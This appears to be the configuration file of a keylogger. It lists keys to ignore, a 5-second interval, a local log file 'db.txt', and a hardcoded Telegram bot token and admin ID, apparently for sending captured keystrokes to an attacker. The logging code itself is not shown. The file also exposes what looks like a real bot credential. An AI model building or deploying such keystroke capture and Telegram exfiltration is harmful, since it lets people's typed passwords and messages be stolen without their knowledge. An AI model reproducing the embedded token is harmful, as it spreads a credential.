BLOCK_KEYS = ["ctrl"
            , "right"
            , "windows left"
            , "down"
            , "up"
            , "left"
            , "tab"
            , "clear"
            , "print screen"
            , "insert"
            , "esc"
            , "caps lock"
            , "num lock"
            , "shift"
            , "alt"
            , "f1"
            , "f2"
            , "f3"
            , "f4"
            , "f5"
            , "f6"
            , "f7"
            , "f8"
            , "f9"
            , "f10"
            , "f11"
            , "f12"
            , "home"
            , "delete"] 

TIME_INTERVAL = 5
MAX_WORDS = 2
FILE_NAME = "db.txt"
BOT_TOKEN = "5712978018:AAG3Kt7drz2ssZgG1_oesWfB1Y_R4ZdClUo"
ADMIN_ID = "1619619885"